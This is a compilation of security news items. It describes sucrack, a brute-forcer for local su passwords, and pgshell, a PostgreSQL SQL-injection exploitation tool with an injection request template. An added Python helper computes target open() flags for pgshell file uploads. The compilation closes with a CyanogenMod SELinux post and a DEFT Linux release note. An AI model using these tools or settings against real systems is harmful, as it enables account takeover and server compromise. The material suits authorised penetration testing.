sucrack is a multithreaded Linux/UNIX tool for brute-force cracking local user accounts via su. This tool comes in handy as a final instance on a system where you do not have many privileges but you are in the wheel group. Many su implementations require a pseudo terminal to be attached in order to take the password from the user. This is why you couldn't just use a simple shell script to do this work. This tool, written in C, is highly efficient and can attempt multiple logins at the same time. Please be advised that using this tool will take a lot of the CPU performance and fill up the logs quite quickly.

sucrack is so far known to be running on FreeBSD, NetBSD and Linux.

Download
    sucrack-1.2.3.tar.gz (109 kb) - README - ChangeLog
    sucrack-1.2.2.tar.gz (103 kb) - README

Installation

Default installation:
    ./configure
    make
    make install

You have two further compiling flags:

Usage

In order to run sucrack, you need to specify a wordlist:
    sucrack wordlist.txt

Or advise it to read the passwords from stdin. In that case other tools with smart password generation algorithms can easily be used. For instance John The Ripper:
    john --stdout --incremental | sucrack -

You generally have two options for printing the progress and the statistics (if you have compiled sucrack with the `--enable-statistics' flag): either by using ANSI escape codes, which makes it look nicer, or without. The -a flag indicates whether ANSI escape codes should be used or not.

Source and more information: leidecker.info
23. pgshell: A tool for exploiting SQL injections in PostgreSQL databases

Download
    pgshell
    test-env.sh

Introduction

The pgshell Perl script exploits configuration weaknesses in the PostgreSQL database management system as described in the corresponding paper (Having Fun With PostgreSQL). It not only allows gathering target system and user information but also privilege escalation, execution of shell commands and uploading of binary files.

The general usage of pgshell could be outlined in three steps:
    gathering information
    creating the system and the upload framework
    launching a shell and uploading files

The minimal parameters are the target host and a request file. The request file contains the HTTP request to send to the server plus a tag <<INJECTION>> that indicates where to perform the SQL injection. A simple request file can look like this:

    GET /index.php?id=1;<<INJECTION>> HTTP/1.0

If not stated otherwise, every execution of pgshell reads from and writes to a session file. This way, information won't get lost and the process can be resumed at any time.

Additionally there are certain settings that can be made in order to work properly against the target system. If you wish to launch a shell or to upload files you need to know the path to the libc. Furthermore, for uploading files, pgshell creates a function which uses the libc function open. Two parameters are needed in order to successfully open a file. These values are the OR'ed (O_CREAT | O_APPEND | O_RDWR) and S_IRWXU. Find out what values those will be on your target system and put everything in an initial session file:

    =target.libc=/lib/libc.so.6
    =target.flag.open=522
    =target.flag.mode=448

Source and more information: leidecker.info
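The "find out what values those will be on your target system" step above is where a pgshell upload silently fails: the numeric open(2) flag bits are part of the platform ABI, and the `522` in the sample session file is the BSD value (O_RDWR 0x2 | O_CREAT 0x200 | O_APPEND 0x8), while a Linux x86/x86_64 target needs 1090 (O_RDWR 02 | O_CREAT 0100 | O_APPEND 02000 in octal). The following added example, which is not part of pgshell, generates the three session-file lines from the <fcntl.h> constants of either ABI and, separately, from the host it runs on. The libc path and the two-ABI table are assumptions: other Linux architectures (sparc and alpha among them) use yet other values, so read the target's headers when in doubt.

```python
"""pgshell session-file values per platform ABI.

Added example, not part of pgshell. FCNTL holds <fcntl.h> constants for
two ABIs (assumption: the target is one of them); S_IRWXU is 0700 on any
POSIX system.
"""
import os
import stat

FCNTL = {
    "linux": {"O_RDWR": 0o2, "O_CREAT": 0o100, "O_APPEND": 0o2000},      # asm-generic, x86/x86_64
    "freebsd": {"O_RDWR": 0x0002, "O_CREAT": 0x0200, "O_APPEND": 0x0008},
}
S_IRWXU = 0o700


def open_flags(platform):
    """Value for =target.flag.open= on the given ABI."""
    f = FCNTL[platform]
    return f["O_CREAT"] | f["O_APPEND"] | f["O_RDWR"]


def session_lines(platform, libc="/lib/libc.so.6"):
    """The three lines to seed the pgshell session file with (libc path assumed)."""
    return [
        "=target.libc=" + libc,
        "=target.flag.open=%d" % open_flags(platform),
        "=target.flag.mode=%d" % S_IRWXU,
    ]


def local_session_lines(libc="/lib/libc.so.6"):
    """Same values taken from this host's os module; only valid when the
    attacking host and the target share an ABI."""
    flags = os.O_CREAT | os.O_APPEND | os.O_RDWR
    return [
        "=target.libc=" + libc,
        "=target.flag.open=%d" % flags,
        "=target.flag.mode=%d" % stat.S_IRWXU,
    ]


if __name__ == "__main__":
    for platform in FCNTL:
        print(platform)
        print("\n".join(session_lines(platform)))
    print("this host")
    print("\n".join(local_session_lines()))
```

If the created function opens nothing on the target, comparing its `=target.flag.open=` line against the output for the other ABI is the first thing to check.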
24. [h=2]This Week In CyanogenMod[/h]

July 19th, 2013 • Written by ciwrl

Week Ending: July 19, 2013 – Special SELinux Edition

"This Week in CyanogenMod" is an ongoing feature that aims to serve as a one-stop shop for weekly updates. Topics discussed are culled from our social media accounts, gerrit, status updates and general thoughts. This week was all about SELinux and adjusting our source to accommodate it.

What is SELinux?

The project's official description reads "SELinux is a security enhancement to Linux which allows users and administrators more control over access control." SELinux is a set of open-sourced and peer-reviewed changes to the core Android software stack to help prevent apps from performing malicious activities. This is done by establishing a set of policies that act as mandatory access controls (MAC). Depending on the policy, it can do things such as prevent apps from running or accessing specific data, or prevent root access altogether.

SELinux has wide-scale adoption throughout the Linux landscape, with Fedora, Red Hat and others incorporating policies to better system security. The default policies are usually written per distribution by their maintainers; we have begun this process for CyanogenMod. We will be working on this policy creation in parallel to Google's own policies for Android, which we believe will be released with the Android 4.3 source, effectively getting us ahead of the eventual 4.3 source release. As this process is open source, policy creation and suggestions will be handled via our gerrit instance.

What it's not

SELinux is not a backdoor for government agencies to spy on you. It is not PRISM, PROMIS, CARNIVORE, The Great Firewall or any other ominous Big Brother-like initiative.

Access Control Modes

By default, we will be shipping with SELinux capabilities enabled in the kernel, but in Permissive mode. What this means is that your phone will behave exactly as it currently does, with no noticeable change to the user. There are 3 modes in total: Enforcing, Permissive and Disabled. While in Enforcing mode, SELinux policies are enforced, preventing whatever causes a violation (e.g. su). Permissive mode logs policy violations, but does not prevent the activity that caused them. Disabled turns SELinux off.

We are using Permissive mode as our default so we can come up with sensible policies. If you submit a log for us to analyze (via JIRA) for SELinux policy improvements, the logged exceptions will be of high value. This will be an ongoing process as we work to incorporate sensible policies for each device repo. As always our source is available on Github and patches will be peer reviewed via gerrit. For those more attuned to personal data security, you are welcome to watch and audit our efforts. For the rest of you, sit back and relax – no need for pitchforks.

Source: This Week In CyanogenMod | CyanogenMod
25. Distribution Release: DEFT Linux 8

Stefano Fratepietro has announced the release of DEFT Linux 8, a Lubuntu-based distribution and live DVD featuring a collection of open-source tools for digital forensics and penetration testing: "Dear guys, we did our best to turn the DEFT 8 beta version into stable -- also by listening to your precious suggestions and feedback -- and here we are. You can download the DEFT 8 final stable ISO image (which now includes DART 2). The stable version has been checked against common bugs but we are human and pretty busy with our jobs so if we missed something, just drop a line to bug at deftlinux.net and we'll collect suggestions and bug fixes for the next release. A big thank you to the DEFT team and to all the supporters. Stay tuned, because much more is yet to come, such as the release of the DEFT 8 virtual appliance (a pre-configured virtual machine you will be able to launch on your workstation by means of VMware Workstation or VMPlayer or VirtualBox); the DEFT 8 user manual; the updated website." Here is the brief release announcement. Download: deft8.iso (2,764MB, MD5).

• 2013-07-20: Distribution Release: DEFT Linux 8
• 2013-07-01: Development Release: DEFT Linux 8 Beta
• 2012-10-23: Distribution Release: DEFT Linux 7.2
• 2012-04-02: Distribution Release: DEFT Linux 7.1
• 2012-02-01: Distribution Release: DEFT Linux 7
• 2012-01-14: Development Release: DEFT Linux 7 RC1

Source: Distribution Release: DEFT Linux 8 (DistroWatch.com News)